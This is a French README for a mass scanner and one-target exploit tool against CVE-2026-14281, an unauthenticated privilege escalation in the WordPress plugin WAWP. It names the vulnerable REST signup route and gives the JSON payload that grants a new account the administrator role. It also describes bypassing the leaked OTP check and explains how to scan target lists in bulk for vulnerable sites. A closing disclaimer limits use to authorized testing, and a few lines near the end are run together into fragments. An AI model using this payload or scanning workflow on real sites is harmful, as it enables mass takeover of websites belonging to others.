
Scanner de masse et exploit ciblé unique pour CVE-2026-14281, une élévation de privilèges non authentifiée dans le plugin WordPress Automation Web Platform via l'inscription REST.
Scanner de masse + Exploit ciblé unique pour CVE-2026-14281 — une escalade de privilèges non authentifiée dans le plugin WordPress Automation Web Platform (WAWP)
<= 4.8.6.
Gestion inappropriée des privilèges (CWE-269) dans le plugin WordPress Automation Web Platform (par 101gen). Les versions <= 4.8.6 sont affectées.
| Champ | Valeur |
|---|---|
| CVE | CVE-2026-14281 |
| Type | Escalade de privilèges non authentifiée |
| CVSS | 9.8 (CRITIQUE) |
| Auth | Aucune requise |
| Affecté | Plugin WAWP <= 4.8.6 |
Le plugin expose une route REST publique :
POST /wp-json/wawp/v1/signup/<op>
Aucune vérification de permission. Le gestionnaire copie les wawp_custom_fields contrôlés par l'attaquant dans update_user_meta() — sans liste blanche. L'attaquant définit :
{
"wawp_custom_fields": {
"wp_capabilities": {"administrator": true},
"wp_user_level": "10"
}
}
Résultat : le nouveau compte obtient le rôle administrator.
Le jeton OTP (otp_transient) est renvoyé en clair dans le corps de la réponse. Une requête GET avec ce jeton le marque comme vérifié — aucun e-mail/SMS nécessaire.
/wp-json/wawp/v1/signup/ avec wp_capabilities: administrator/wp-login.php avec les nouveaux identifiants/wp-admin/users.php3.7+requests, urllib3git clone https://github.com/yourname/langz-scanner.git
cd langz-scanner
pip install requests urllib3
python3 CVE-2026-14281.py
[1] Mass Scan -> detect many targets, save vuln to txt
[2] Verify Single -> exploit + confirm + auto cleanup
[0] Exit
Mass Scan : fichier de liste de cibles en entrée, fichier de sortie (par défaut vuln.txt), nombre de threads (par défaut 20).
Verify Single : tapez YA, entrez l'URL cible. L'outil crée un admin temporaire, vérifie, puis nettoie.
vuln.txt contient uniquement les URLs vulnérables confirmées, une par ligne :
http://target1.com
https://target2.org
4.8.6/wp-json/wawp/v1/signup/For AUTHORIZED SECURITY TESTING only.
Do not use against systems you don't own or have permission to test.
The developer assumes no responsibility for misuse.
Use it wisely. Knowledge is meant to protect, not to destroy.